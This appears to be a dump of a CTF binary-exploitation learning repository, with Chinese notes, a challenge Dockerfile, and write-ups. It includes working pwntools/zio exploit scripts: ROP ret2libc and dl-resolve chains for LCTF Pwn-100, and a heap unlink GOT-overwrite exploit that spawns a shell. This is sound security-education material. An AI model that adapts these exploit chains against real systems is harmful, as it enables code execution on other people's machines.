``` 182 | ### 关闭alarm 183 | 184 | alarm比较烦,不方便调试 185 | 186 | handle SIGALRM print nopass 可以用来把alarm关掉(实际上我也没法gdb调试, 不知道为什么) 187 | 188 | ### 加载信息 189 | ```bash 190 | info proc map 查看各个库加载信息然后寻找 "/bin/sh" 字符串 191 | strings: 查看文件中可见字符串 192 | strings -a -t x /lib32/libc.so.6 | grep "/bin/sh" 193 | objdump -d stack7 | grep "ret" 可以用来查找ret指令 194 | objdump -x [filename] 打印头文件信息以及区段信息 195 | objdump -T libc.so | grep gets 196 | ``` 197 | ### 查找gadgets 198 | ```bash 199 | ROPgadget --binary level4 --only "pop|ret" 200 | ROPgadget --binary libc.so.6 --only "pop|ret" | grep rdi 201 | objdump -d ./level5 202 | __libc_csu_init这个函数里找 ROP 203 | objdump -d -j.plt pwn | grep write 查找write函数地址 204 | ``` 205 | ## 4. Konwledge 206 | QAQ 207 | 208 | ### 基础知识 209 | 210 | #### 覆盖`x86_64 ret libc` 211 | 执行call操作时栈内已经存放了传递的变量,call将当前地址压入栈中,作为返回地址,然后执行jmp到指定函数位置。构造call system时可以利用这个先存放一个地址,然后跳转。 212 | #### ROP 213 | 基础技能了,不过自己经常是会忘,都要照着汇编来看参数传递顺序≧ ﹏ ≦ 214 | 215 | 附上文章[uaf_io find system](http://uaf.io/exploitation/misc/2016/04/02/Finding-Functions.html) 216 | #### uaf 217 | pwnable 218 | 219 | #### double free 220 | 主要就是堆堆的大小要十分的清楚 221 | #### unlink 222 | 一般都是结合其他的一些漏洞一起用 223 | 224 | #### off-by-one 225 | 孤独的1byte 226 | 227 | #### shrink 228 | 就是改变堆大小进行进一步利用 229 | 230 | #### `IO_FILE` 231 | 这个是文件流相关的利用,著名的有`house of orange` 232 | 233 | ### 一些坑 234 | 235 | #### 关于DynELF 236 | 有一定的成功率,不过如果网速或者服务器不过关,这个方法并不是很好,dl-resolve相对易成功一点。baidu杯那个不知道是不是这个原因QAQ 237 | #### 其他的坑 238 | to be continued 239 | 240 | ## 5. resources 241 | 242 | ### [pwnable](http://pwnable.kr/play.php) 243 | 主要linux elf为主 比较适合开拓思路和入门,做过一点,不过因为懒,有点荒废了 244 | 245 | 配上[writeup-riskgray](http://rickgray.me/2015/07/24/toddler-s-bottle-writeup-pwnable-kr.html)食用更佳 246 | ### [io](http://io.netgarage.org/) 247 | 还没来得及看,主要是有arm的 248 | 249 | ### [LiveOverFlow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) 250 | youtube有相关视频 从他的视频学了不少 251 | ### [CTF writeup](https://github.com/ctfs) 252 | 各种writeup (大多国外),感觉国内各ctf都参照了很多国外的比赛 253 | ### CTFer-bin 254 | 255 | - [muhe](http://o0xmuhe.me/) 256 | - [hackfun](https://www.hackfun.org/) 257 | - [Icemakr](http://0byjwzsf.me/) LCTF2016 pwn出题大大 258 | - [Zing](http://l-team.org/) 259 | - [tang](http://bigtang.org/) 260 | - [uaf](http://uaf.io/) 国外一位,各种ctf wp都有他的身影 261 | 262 | ### [resource recommand](http://www.pentest.guru/index.php/2016/01/28/best-books-tutorials-and-courses-to-learn-about-exploit-development/) 263 | 各种资源,看了晕 264 | ### [DEF CON](https://www.defcon.org/#) 265 | 知名hacker团队 266 | ### [tisiphone](https://tisiphone.net/) 267 | 推送多 有心得体会系列文章可以看看 268 | 269 | -------------------------------------------------------------------------------- /Pwn/docker_env/Docker.base: -------------------------------------------------------------------------------- 1 | FROM ubuntu:14.04 2 | MAINTAINER pwnBase 3 | LABEL Description="pwn base" VERSION='1.0' 4 | 5 | #installation 6 | RUN apt-get update && apt-get upgrade -y 7 | RUN apt-get install -y build-essential socat 8 | -------------------------------------------------------------------------------- /Pwn/docker_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubpwn:base 2 | MAINTAINER pwn_test 3 | LABEL Description="mpwn test" VERSION='1.0' 4 | 5 | #user 6 | RUN adduser --disabled-password --gecos '' bxs1 7 | RUN chown -R root:bxs1 /home/bxs1/ 8 | RUN chmod 750 /home/bxs1 9 | RUN touch /home/bxs1/flag.txt 10 | RUN chown root:bxs1 /home/bxs1/flag.txt 11 | RUN chmod 440 /home/bxs1/flag.txt 12 | RUN chmod 740 /usr/bin/top 13 | RUN chmod 740 /bin/ps 14 | RUN chmod 740 /usr/bin/pgrep 15 | RUN export TERM=xterm 16 | 17 | WORKDIR /home/bxs1/ 18 | COPY bxs1.c /home/bxs1 19 | COPY flag.txt /home/bxs1 20 | 21 | #complie 22 | RUN gcc -o bxs1 bxs1.c 23 | 24 | EXPOSE 2333 25 | CMD su bxs1 -c "socat -T10 TCP-LISTEN:2333,reuseaddr,fork EXEC:/home/bxs1/bxs1" 26 | -------------------------------------------------------------------------------- /Pwn/docker_env/README.md: -------------------------------------------------------------------------------- 1 | ## 说明 2 | 3 | 利用docker来构建pwn环境比较安全和方便,不过也有一些不方便的地方。比如printf格式化输出的问题,端口映射之后不能打印字符串等。。 4 | 5 | >参考0ctf2016 pwn的工程 6 | 7 | ## 配置 8 | 创建了两个Dockerfile 9 | 10 | ### Dockerfile.base 11 | ``` 12 | sudo docker build --network=host -t ubpwn:base . 13 | ``` 14 | 生成一个基础镜像,主要下载一些要用的固件和服务。需要指定网络模式host,否则不能联网下载。 15 | 16 | ### Dockerfile 17 | ``` 18 | sudo docker build --network=host -t bxs:pwn1 . 19 | ``` 20 | 生成最终的镜像可以直接通过以下命令运行 21 | ``` 22 | sudo docker run -p 2333:2333 bxs:pwn1 23 | ``` 24 | 注意端口映射 25 | 26 | ### 导出镜像 27 | ``` 28 | docker save -o pwndocker.tar pwn1:pwn1 29 | ``` 30 | 31 | ### 导入镜像 32 | ``` 33 | sudo docker load --input pwndocker.tar 34 | ``` 35 | -------------------------------------------------------------------------------- /Pwn/examples/README.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 学习过程的一些简单例子 3 | -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/README.md: -------------------------------------------------------------------------------- 1 | ## tips 2 | 主要是读取内存 泄露地址的时候利用特征进行操作 3 | -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/README.md: -------------------------------------------------------------------------------- 1 | ## 溢出点 2 | 很明显在40068E那个函数里典型rettolibc 3 | ``` 4 | .text:0000000000400692 sub rsp, 40h 5 | .text:0000000000400696 lea rax, [rbp+var_40] 6 | .text:000000000040069A mov edx, 10 7 | .text:000000000040069F mov esi, 0C8h 8 | .text:00000000004006A4 mov rdi, rax 9 | .text:00000000004006A7 call read_bytes 10 | ``` 11 | 这里只有0x40的栈空间,而却是读0xc8的字节 12 | 加上ebp, 填充0x40+0x08就能到ret的地址了 13 | 14 | ## ????? 15 | 没有给so库 16 | -脸懵逼。。。可以dl-resolve. 17 | 参考了l-ctf官方wp 18 | 19 | ## Tips 20 | ``` 21 | *1 22 | def gadget_arg1(func_addr, arg): 23 | payload = overwrite 24 | payload += p64(poprdiret_addr) 25 | payload += p64(arg) 26 | payload += p64(func_addr) 27 | payload += p64(vulnfunc_addr) 28 | return payload 29 | *2 30 | def gadget_call(func_addr, arg1=0, arg2=0, arg3=0, init_ret1=movcall_addr, init_ret2=vulnfunc_addr): 31 | payload = overwrite 32 | payload += p64(pop5ret_addr) 33 | payload += p64(0) # rbx 34 | payload += p64(1) # rbp 35 | payload += p64(func_addr) 36 | payload += p64(arg3) + p64(arg2) + p64(arg1) 37 | payload += p64(init_ret1) # call 38 | payload += '\x00'*(7*0x8) # pop7 39 | payload += p64(init_ret2) # 最后返回到有漏洞的地方下次再次利用 40 | return payload 41 | ``` 42 | 43 | 注意上面这两个函数。
44 | 1.最后是ret左右func_addr应该是plt段的函数地址, 45 | 例如.plt [puts] = 0x400500
46 | 调用的时候是rip先到0x400500(这里的指令对应jmp 0x7???????)然后跳到该函数真正地址
47 | 但是如果ret 0x601018(这是got表 里面存的是真正的函数地址的值) 就会执行0x601018这个地址对应的值(转换成code)
48 | 49 | 2.是call func_addr, 所以必须是got的地址
50 | .got[read] = 0x601028
51 | 调用的时候是call 0x601028(call的是真正的函数的地址 比如call 0x7ff????????)
52 | 但是如果用ret 就会ret到0x601028 rip指向0x601028 明显不是真正func_addr的地址
53 | 54 | 所以 总结来说就是
55 | ret 后面必须是 .plt
56 | __libc_init 里用call来必须是 .got的 57 | 58 | ## 主要函数 59 | ``` 60 | def exp(sys_addr): 61 | # read(0, rwdata_addr, 0x08) 写入8个字节字符串 62 | payload = gadget_call(read_got, arg1=0, arg2=rwdata_addr, arg3=0x10) 63 | payload += 'D'*(200-len(payload)) 64 | p.send(payload) 65 | log.info('Sending system address and binsh') 66 | p.send('/bin/sh\x00'+p64(sys_addr)) 67 | p.recvuntil('bye~\n') 68 | # 检查一下 69 | leak(rwdata_addr,0x08) 70 | leak(rwdata_addr+8,0x08) 71 | # call sys "/bin/sh" 72 | payload = gadget_call(rwdata_addr+8, arg1=rwdata_addr) 73 | payload += 'D'*(200-len(payload)) 74 | p.send(payload) 75 | p.recvuntil('bye~\n') 76 | p.interactive() 77 | ``` 78 | 这里自己用的pwntools
79 | 主要是修改got表。期间出了很多问题。细心是关键。 80 | -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/pwn1003s4de5rf76tg87yhu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/dl_resolve/lctf_Pwn-100/pwn1003s4de5rf76tg87yhu -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/pwn1003s4de5rf76tg87yhu.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/dl_resolve/lctf_Pwn-100/pwn1003s4de5rf76tg87yhu.i64 -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/reference.py: -------------------------------------------------------------------------------- 1 | from zio import * 2 | from pwnlib.dynelf import * 3 | from pwnlib.elf import * 4 | 5 | io = zio(('127.0.0.1', 2332), print_read = COLORED(REPR, 'red'), print_write = COLORED(REPR, 'blue'), timeout = 100000) 6 | # io = zio(('119.28.63.211', 2332), print_read = False, print_write = False, timeout = 10000) 7 | # io.hint([0x4006b7]) 8 | 9 | got_read = 0x601028 10 | got_puts = 0x601018 11 | plt_puts = 0x400500 12 | adr_bss = 0x601000 13 | 14 | p_rdi_ret = 0x00400763 15 | 16 | def prepare(address): 17 | payload = 'A' * 0x48 18 | payload += l64(p_rdi_ret) 19 | payload += l64(address) 20 | payload += l64(plt_puts) 21 | payload += l64(0x400550) # program entry 22 | payload = payload.ljust(0xc8, 'A') 23 | io.w(payload) 24 | io.rtl('bye~\n') 25 | 26 | def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0): 27 | payload = l64(part1) # part1 entry pop_rbx_pop_rbp_pop_r12_pop_r13_pop_r14_pop_r15_ret 28 | payload += l64(0x0) # rbx be 0x0 29 | payload += l64(0x1) # rbp be 0x1 30 | payload += l64(jmp2) # r12 jump to 31 | payload += l64(arg3) # r13 -> rdx arg3 32 | payload += l64(arg2) # r14 -> rsi arg2 33 | payload += l64(arg1) # r15 -> edi arg1 34 | payload += l64(part2) # part2 entry will call [rbx + r12 + 0x8] 35 | payload += 'A' * 56 # junk 36 | return payload 37 | 38 | def getshell(adr_system): 39 | payload = 'A' * 0x48 40 | payload += com_gadget(0x40075a, 0x400740, jmp2 = got_read, 41 | arg1 = 0x0, 42 | arg2 = adr_bss + 0x80, 43 | arg3 = 0x10) 44 | payload += l64(0x400550) # program entry 45 | payload = payload.ljust(0xc8, 'A') 46 | io.w(payload) 47 | io.rtl('bye~\n') 48 | io.w('/bin/sh\x00' + l64(adr_system)) 49 | 50 | payload = 'A' * 0x48 51 | payload += com_gadget(0x40075a, 0x400740, jmp2 = adr_bss + 0x88, 52 | arg1 = adr_bss + 0x80) 53 | payload += l64(0xdeadbeef) 54 | payload = payload.ljust(0xc8, 'A') 55 | io.w(payload) 56 | io.rtl('bye~\n') 57 | 58 | def leak(address, size): 59 | count = 0 60 | buf = '' 61 | while count < size: 62 | prepare(address + count) 63 | # leak(str(address + count)) 64 | while True: 65 | ch = io.read(1, timeout = 0x10) 66 | #print ch 67 | count += 1 68 | if ch == '\n': 69 | buf += '\x00' 70 | break 71 | else: 72 | buf += ch[0] 73 | leak_data = buf[:size] 74 | #print '{} ==> {}'.format(hex(address), leak_data.encode('hex')) 75 | return leak_data 76 | 77 | # manual leak libc 78 | BITS = 64 79 | 80 | # get arbitrary address located in libc 81 | def get_elf_entry(got): 82 | entry = l64(leak(got, 0x8)) 83 | print '[+] libc entry\t\t\t\t:\t0x%x' % entry 84 | return entry 85 | 86 | # find libc base according to Magic 87 | def find_elf_base(entry): 88 | if BITS == 64: 89 | libc_base = entry & 0xfffffffffffff000 90 | while True: 91 | garbage = leak(libc_base, 0x4) 92 | if garbage == '\x7fELF': 93 | break 94 | libc_base -= 0x1000 95 | print '[+] libc base\t\t\t\t:\t0x%x' % libc_base 96 | return libc_base 97 | 98 | # find program header table 99 | def find_phdr(elf_base): 100 | if BITS == 64: 101 | # get address of program header table 102 | phdr = l64(leak(elf_base + 0x20, 0x8)) + elf_base 103 | print '[+] program headers table\t\t:\t0x%x' % phdr 104 | return phdr 105 | 106 | # find dynamic section table (.dynamic section -> DYNAMIC segment) 107 | def find_dyn_section(phdr, elf_base): 108 | if BITS == 64: 109 | phdr_ent = phdr 110 | while True: 111 | garbage = l32(leak(phdr_ent, 0x4)) 112 | # p_type of dynamic segment is 0x2 113 | if garbage == 0x2: 114 | break 115 | phdr_ent += 0x38 116 | dyn_section = l64(leak(phdr_ent + 0x10, 0x8)) + elf_base 117 | print '[+] .dynamic section headers table\t:\t0x%x' % dyn_section 118 | return dyn_section 119 | 120 | def find_sym_str_table(dyn_section): 121 | if BITS == 64: 122 | dyn_ent = dyn_section 123 | dt_sym_tab = 0x0 124 | dt_str_tab = 0x0 125 | while True: 126 | garbage = l64(leak(dyn_ent, 0x8)) 127 | if garbage == 0x6: 128 | dt_sym_tab = l64(leak(dyn_ent + 0x8, 0x8)) 129 | elif garbage == 0x5: 130 | dt_str_tab = l64(leak(dyn_ent + 0x8, 0x8)) 131 | if dt_str_tab and dt_sym_tab: 132 | break 133 | dyn_ent += 0x10 134 | print '[+] symtab\t\t\t\t:\t0x%x' % dt_sym_tab 135 | print '[+] strtab\t\t\t\t:\t0x%x' % dt_str_tab 136 | return (dt_sym_tab, dt_str_tab) 137 | 138 | def find_func_adr(dt_sym_tab, dt_str_tab, func, elf_base): 139 | if BITS == 64: 140 | sym_ent = dt_sym_tab 141 | while True: 142 | garbage = l32(leak(sym_ent, 0x4)) 143 | name = leak(dt_str_tab + garbage, len(func)) 144 | if name == func: 145 | break 146 | sym_ent += 0x18 147 | adr_func = l64(leak(sym_ent + 0x8, 0x8)) + elf_base 148 | print '[+] %s loaded address\t:\t0x%x' % (func, adr_func) 149 | return adr_func 150 | 151 | # exploit ELF 152 | def lookup(func): 153 | entry = get_elf_entry(got_read) 154 | elf_base = find_elf_base(entry) 155 | phdr = find_phdr(elf_base) 156 | dyn_section = find_dyn_section(phdr, elf_base) 157 | dt_sym_tab, dt_str_tab = find_sym_str_table(dyn_section) 158 | func_address = find_func_adr(dt_sym_tab, dt_str_tab, func, elf_base) 159 | return func_address 160 | 161 | leak(got_read, 0x8) 162 | adr_system = lookup('__libc_system') 163 | print '[+] system addr\t:\t' + hex(adr_system) 164 | 165 | getshell(adr_system) 166 | io.itr() 167 | -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/solve.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | from pwn import * 3 | #from zio import * 4 | import socket, struct, binascii 5 | import telnetlib 6 | 7 | elf = ELF('./pwn1003s4de5rf76tg87yhu') 8 | 9 | if True: 10 | #context.log_level = 'debug' 11 | p = process('./pwn1003s4de5rf76tg87yhu') 12 | else: 13 | p = remote('127.0.0.1', 12345) 14 | 15 | puts_plt = elf.symbols['puts'] #0x4005b0 # : objdump -d -j.plt pwn | grep puts 16 | read_plt = elf.symbols['read'] #0x4005e0 # : objdump -d -j.plt pwn | grep read 17 | log.info('plt.puts: ' + hex(puts_plt)) 18 | log.info('plt.read: ' + hex(read_plt)) 19 | 20 | puts_got = elf.got['puts'] # 0x601020 21 | read_got = elf.got['read'] # 0x601038 22 | log.info('got.puts: ' + hex(puts_got)) 23 | log.info('got.read: ' + hex(read_got)) 24 | 25 | rwdata_addr = 0x601000 # = = attention 26 | 27 | overwrite = 'A'*(0x40 + 8) 28 | 29 | poprdiret_addr = 0x400763 # ROPgadget --binary welpwn --only "pop|ret" | grep rdi 30 | # 40075a: 5b pop %rbx 31 | pop5ret_addr = 0x40075a # __libc_csu_init 32 | movcall_addr = 0x400740 # __libc_csu_init 33 | 34 | vulnfunc_addr = 0x400550 # exploit address 35 | 36 | 37 | def gadget_arg1(func_addr, arg): 38 | payload = overwrite 39 | payload += p64(poprdiret_addr) 40 | payload += p64(arg) 41 | payload += p64(func_addr) 42 | payload += p64(vulnfunc_addr) 43 | return payload 44 | 45 | def gadget_call(func_addr, arg1=0, arg2=0, arg3=0, init_ret1=movcall_addr, init_ret2=vulnfunc_addr): 46 | payload = overwrite 47 | payload += p64(pop5ret_addr) 48 | payload += p64(0) # rbx 49 | payload += p64(1) # rbp 50 | payload += p64(func_addr) 51 | payload += p64(arg3) + p64(arg2) + p64(arg1) 52 | payload += p64(init_ret1) # call 53 | payload += '\x00'*(7*0x8) # pop7 54 | payload += p64(init_ret2) # 最后返回到有漏洞的地方下次再次利用 55 | return payload 56 | 57 | def leak(address, n_size): 58 | count = 0 59 | buf = '' 60 | payload = gadget_arg1(puts_plt, address) 61 | payload += 'D'*(200-len(payload)) 62 | p.send(payload) 63 | p.recvuntil('bye~\n') 64 | while countname_ptr, length); // 这里length也是输入的,但是这里没有对length检查,所以在new创建的size如果小于这个,就会发生堆溢出 20 | ``` 21 | 22 | ## 利用原理 23 | small chunk // large chunk 在某相邻的chunk free之后, 该chunk对前后的chunk检查, 如果为free, 就进行向前或向后何必, 并且把检查到的free chunk从bins双链表中删除 24 | 25 | 由linux堆的结构可以知道,如果创建了chunk1,再创建chunk2(这里可以说是name_ptr指向的地方),chunk的头部信息首先是 26 | 27 | ```shell 28 | 0x00 pre chunk size 29 | 0x08 chunk size |N|M|P| P=0 : pre chunk free 30 | 0x10 fd 31 | 0x18 bk 32 | ``` 33 | 其中主要P表示前一堆块是否被使用 34 | 35 | 这里把P覆盖成0的话,就会使程序错误的执行ulink, 而且程序错误的认为name_ptr_0 是free chunk 即可以认为name_ptr_0指向了bin里的一个项 36 | ```c 37 | /* Take a chunk off a bin list */ 38 | #define unlink(AV, P, BK, FD) 39 | { 40 | FD = P->fd; //P == &chunk1 41 | BK = P->bk; 42 | if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) 43 | malloc_printerr (check_action, "corrupted double-linked list", P, AV); 44 | else 45 | { 46 | FD->bk = BK; 47 | BK->fd = FD; //需要注意这里 就是把free chunk从双链表删除 48 | //large chunk do something 49 | //... 50 | } 51 | } 52 | ``` 53 | 54 | then 55 | ```C 56 | P->fd->bk = P->bk; 57 | P->fd = addr-0x18 , P->bk = value 时 58 | P->fd->bk = P->bk 相当于修改*((addr-0x18)+0x18) 为 value 59 | ``` 60 | 61 | ## 流程 62 | 主要流程是: 63 | 64 | 1. 创建三个chunk chunk[0~3] 65 | 66 | 2. edit(chunk0) 构造chunk0为free chunk并且覆盖下chunk1的头部 67 | 68 | 3. 然后释放chunk1 触发unlink 修改0x6016d0(name_ptr 0的地址)为前面的一地址(0x6016b8) 69 | 70 | 4. 调用edit(chunk0) 对0x6016b8那一段空间的值更改, 而且刚好能够更改到name_ptr 0的地址(更改为got表中free的地址) 71 | 72 | 5. 调用list(0)就可以leak出真实的free地址, 然后计算真实的system函数地址, 绕过ASLR 73 | 74 | 6. 再次调用edit(0) 对got表中free更改, 更改为4中获得的system函数地址, 那么之后只要调用free, 就相当于调用system 75 | 76 | 7. 只要之前把chunk3那边写有"/bin/sh"相关字符串的free掉, 就能执行system了 77 | 78 | 8. 第一次搞orz 照着别人的自己理解的改(抄)了下 79 | 80 | ### 计算system函数地址 81 | 利用libc库中的free函数地址 82 | 83 | ```shell 84 | objdump -T lib.so.6 | grep system 85 | 86 | 本机的so库: lib_sys_addr = 0x0000000000046590 87 | 88 | lib_free_addr = 0x0000000000082d00 89 | 90 | 提供的so库: lib_sys_addr = 0x0000000000046640 91 | 92 | lib_free_addr = 0x0000000000082df0 93 | 94 | system_addr = free_addr - lib_free_addr + lib_sys_addr 95 | ``` 96 | 97 | ### 遇到的坑 98 | 1. size 99 | ```C 100 | data_0 = 'p'*(first_size-0x20) // 这里伪造的时候填充的数据需要减去头部信息, 而不是new时候的大小 101 | ``` 102 | 103 | 2. size_1 = p64(second_size + 0x10) 104 | 这里要注意第二个块的大小是加上头部的pre chunk size和自身chunk size 并没有fd和bk
105 | 106 | 3. 读取leak出的free地址 107 | 108 | 样例用的是zio 而我自己用pwn
109 | 110 | 这个真是坑惨了, 搞了好几个小时(不知道为什么没法调试), 结果就是读取的时候没有把地址转换对orz(我好菜啊)
111 | 112 | 我用的转换方法好笨orz 其实最简单的是用zio的l64
113 | 114 | ```python 115 | return l64(io.read(16).decode('hex')) 116 | 117 | recv_addr = p.read(8 * 2) #这里注意对读取的地址进行适当的转换 118 | ret_addr = '' 119 | for i in range(8): 120 | ret_addr += recv_addr[2*i+1] + recv_addr[2*i] 121 | print type(recv_addr), len(recv_addr), recv_addr 122 | print type(ret_addr), len(ret_addr), ret_addr 123 | return int(ret_addr[::-1], 16) 124 | ``` 125 | 126 | ## Reference 127 | 128 | 1. [Linex 堆](http://tyrande000.how/2016/02/20/linux%E4%B8%8B%E7%9A%84%E5%A0%86%E7%AE%A1%E7%90%86/) 129 | 130 | 2. [linux 堆 上](https://jiji262.github.io/wooyun_articles/drops/Linux%E5%A0%86%E7%AE%A1%E7%90%86%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%20(%E4%B8%8A%E5%8D%8A%E9%83%A8).html) 131 | 132 | 3. [linux 堆 下](https://jiji262.github.io/wooyun_articles/drops/Linux%E5%A0%86%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90(%E4%B8%8B%E5%8D%8A%E9%83%A8).html) 133 | 134 | 4. [linux 堆 unlink利用](http://tyrande000.how/2016/03/21/linux%E5%A0%86%E6%BA%A2%E5%87%BA%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90/) 135 | 强网杯”网络安全挑战赛WriteUp 136 | -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/heap/unlink/libc.so.6 -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/libc.so.6.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/heap/unlink/libc.so.6.i64 -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/payload.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | from pwn import * 3 | 4 | p = process('./shellman') 5 | #p = remote('127.0.0.1', 12345) 6 | 7 | def list_sh(): 8 | p.recvuntil('>') 9 | p.sendline('1') 10 | p.recvuntil('SHELLC0DE 0: ') 11 | recv_addr = p.read(8 * 2) #这里注意对读取的地址进行适当的转换 12 | ret_addr = '' 13 | for i in range(8): 14 | ret_addr += recv_addr[2*i+1] + recv_addr[2*i] 15 | print type(recv_addr), len(recv_addr), recv_addr 16 | print type(ret_addr), len(ret_addr), ret_addr 17 | return int(ret_addr[::-1], 16) 18 | 19 | def new_sh(sh_str): 20 | p.recvuntil('>') 21 | p.sendline('2') 22 | p.recvuntil(':') 23 | p.sendline(str(len(sh_str))) 24 | p.recvuntil(':') 25 | p.send(sh_str) 26 | p.recvuntil('Successfully created a new shellcode.') 27 | 28 | 29 | def edit_sh(number, sh_str): 30 | p.recvuntil('>') 31 | p.sendline('3') 32 | p.recvuntil(':') 33 | p.sendline(str(number)) 34 | p.recvuntil(':') 35 | p.sendline(str(len(sh_str))) 36 | p.recvuntil(':') 37 | p.send(sh_str) 38 | 39 | def del_sh(number): 40 | p.recvuntil('>') 41 | p.sendline('4') 42 | p.recvuntil(':') 43 | p.sendline(str(number)) 44 | 45 | def main(): 46 | # 创建两个chunk 47 | first_size = 0xa0 48 | second_size = 0xa0 49 | new_sh('A'*first_size) 50 | new_sh('B'*second_size) 51 | new_sh('/bin/sh;') 52 | # 构造第一个区的信息 53 | PREV_IN_USE = 0x1 54 | prev_size_0 = p64(0) 55 | size_0 = p64(first_size | PREV_IN_USE) 56 | fd_0 = p64(0x6016d0 - 0x18) 57 | bk_0 = p64(0x6016d0 - 0x10) # 0x6016c0可以从bss段找到 加上flag 和 length的偏移就是第一个name_ptr了 58 | data_0 = 'p'*(first_size-0x20) # 去掉header 这里是构造chunk0为free chunk 所以算上fd和bk 59 | prev_size_1 = p64(first_size) 60 | size_1 = p64(second_size + 0x10) # 0x10为header大小 因为不是free chunk 所以没有fd和bk 61 | payload1 = prev_size_0 + size_0 + fd_0 + bk_0 + data_0 #first fake free chunk 62 | payload1 += prev_size_1 + size_1 #second chunk header 63 | edit_sh(0, payload1) # 覆盖chunk 64 | # 触发unlink 65 | del_sh(1); 66 | free_got_addr = 0x0000000000601600 67 | # *0x6016d0 = 0x6016d0 - 0x18 即shell_0的name_ptr已经变成了shell_0的首地址 68 | rubbish = p64(0x0) # 这里从程序看 0x6010b8 是无关紧要的 69 | is_shellcode_exist = p64(0x1) # flag 70 | shellcode_size = p64(0xa) # 要打印的字符串长度 10*%02x 71 | libc_free_got = p64(free_got_addr) # got表中free的地址 72 | payload2 = rubbish + is_shellcode_exist + shellcode_size + libc_free_got 73 | # leak 74 | edit_sh(0, payload2) 75 | free_address = list_sh() 76 | print "free_address:", hex(free_address) 77 | # 计算system地址 78 | lib_sys_addr = 0x0000000000046590 # 如果在本机测试, 用ldd查看下程序装载的so库, 然后到该库中objdump -T 查找对应函数就好了 79 | lib_free_addr = 0x0000000000082d00 80 | #lib_sys_addr = 0x46640 # 这里是在提供的so中找到的 81 | #lib_free_addr = 0x82df0 82 | system_addr = free_address - lib_free_addr + lib_sys_addr 83 | print "system_addr:", hex(system_addr) 84 | # 修改got表中free地址为system 85 | edit_sh(0, p64(system_addr)) 86 | # 触发free(实际上已经修改成了system) 87 | del_sh(2) 88 | p.interactive() 89 | 90 | main() 91 | -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/refer_exp.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | from pwn import * 3 | from zio import * 4 | 5 | p = process('./shellman') 6 | #p = remote('127.0.0.1', 12345) 7 | 8 | def list_sh(): 9 | p.recvuntil('>') 10 | p.sendline('1') 11 | p.recvuntil('SHELLC0DE 0: ') 12 | recv_addr = p.read(16).decode('hex') 13 | print recv_addr 14 | return l64(recv_addr) 15 | 16 | def new_sh(sh_str): 17 | p.recvuntil('>') 18 | p.sendline('2') 19 | p.recvuntil(':') 20 | p.sendline(str(len(sh_str))) 21 | p.recvuntil(':') 22 | p.send(sh_str) 23 | 24 | 25 | def edit_sh(number, sh_str): 26 | p.recvuntil('>') 27 | p.sendline('3') 28 | p.recvuntil(':') 29 | p.sendline(str(number)) 30 | p.recvuntil(':') 31 | p.sendline(str(len(sh_str))) 32 | p.recvuntil(':') 33 | p.send(sh_str) 34 | 35 | def del_sh(number): 36 | p.recvuntil('>') 37 | p.sendline('4') 38 | p.recvuntil(':') 39 | p.sendline(str(number)) 40 | 41 | def main(): 42 | # 创建两个chunk 43 | first_size = 0xa0 44 | second_size = 0xa0 45 | new_sh('A'*first_size) 46 | new_sh('B'*second_size) 47 | new_sh('/bin/sh;') 48 | # 构造第一个区的信息 49 | PREV_IN_USE = 0x1 50 | prev_size_0 = p64(0) 51 | size_0 = p64(first_size | PREV_IN_USE) 52 | print "size_0:", size_0 53 | fd_0 = p64(0x6016d0 - 0x18) 54 | bk_0 = p64(0x6016d0 - 0x10) # 0x6016c0可以从bss段找到 加上flag 和 length的偏移就是第一个name_ptr了 55 | data_0 = 'p'*(first_size-0x20) # 去掉header 这里是构造chunk0为free chunk 所以算上fd和bk 56 | prev_size_1 = p64(first_size) 57 | size_1 = p64(second_size + 0x10) # 0x10为header大小 因为不是free chunk 所以没有fd和bk 58 | payload1 = prev_size_0 + size_0 + fd_0 + bk_0 + data_0 59 | payload1 += prev_size_1 + size_1 60 | # test1 61 | ptr_addr = 0x6016d0 62 | payload = p64(0) + p64(0xa1) + p64(ptr_addr-0x18) + p64(ptr_addr-0x10) + 'a'*0x80 + p64(0xa0) + p64(0xb0) 63 | edit_sh(0, payload1) # 覆盖chunk 64 | # 触发unlink 65 | del_sh(1); 66 | # *0x6016d0 = 0x6016d0 - 0x18 即shell_0的name_ptr已经变成了shell_0的首地址 67 | rubbish = p64(0x0) # 这里从程序看 0x6010b8 是无关紧要的 68 | is_shellcode_exist = p64(0x1) # flag 69 | shellcode_size = p64(0xa) # 要打印的长度 10*%02x 70 | libc_free_got = p64(0x0000000000601600) # got表中free的地址 71 | payload2 = rubbish + is_shellcode_exist + 